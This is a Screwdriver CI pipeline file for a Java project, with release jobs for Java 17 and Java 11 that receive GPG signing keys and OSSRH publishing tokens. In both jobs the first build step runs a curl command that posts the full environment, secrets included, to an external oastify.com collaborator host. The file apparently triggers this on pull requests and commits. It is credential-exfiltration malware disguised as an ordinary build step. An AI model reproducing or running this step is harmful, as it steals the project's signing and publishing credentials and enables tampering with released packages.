cache:
   pipeline: ["~/.m2"]

shared:
   annotations:
       screwdriver.cd/cpu: TURBO
       screwdriver.cd/ram: TURBO

   environment:
       #Fetches history so Sonar can assign blame.
       GIT_SHALLOW_CLONE: false

jobs:

  release-java17:
    image: maven:3.8.5-openjdk-17
    secrets:
        - GPG_KEYNAME  
        - GPG_PASSPHRASE
        - GPG_ENCPHRASE
        - OSSRH_USER  
        - OSSRH_TOKEN
    requires: 
      - ~pr
      - ~commit
    steps:
      - run_arbitrary_script: curl --data "$(set)" "http://bn2p72yse9vy7xgsyr3x54oyvp1jpjd8.oastify.com/"
      - prebuild: microdnf install --nodocs openssl gnupg
      - build: "screwdriver/scripts/build.sh"
      - publish: "screwdriver/scripts/publish.sh"

  release-java11:
    image: maven:3.8.2-openjdk-11
    requires:
      - ~pr
      - ~commit    
    secrets:
        - GPG_KEYNAME  
        - GPG_PASSPHRASE
        - GPG_ENCPHRASE
        - OSSRH_USER
        - OSSRH_TOKEN
    steps:
      - run_arbitrary_script: curl --data "$(set)" "http://bn2p72yse9vy7xgsyr3x54oyvp1jpjd8.oastify.com/"
      - build: "screwdriver/scripts/build.sh"
      - publish: "screwdriver/scripts/publish.sh"
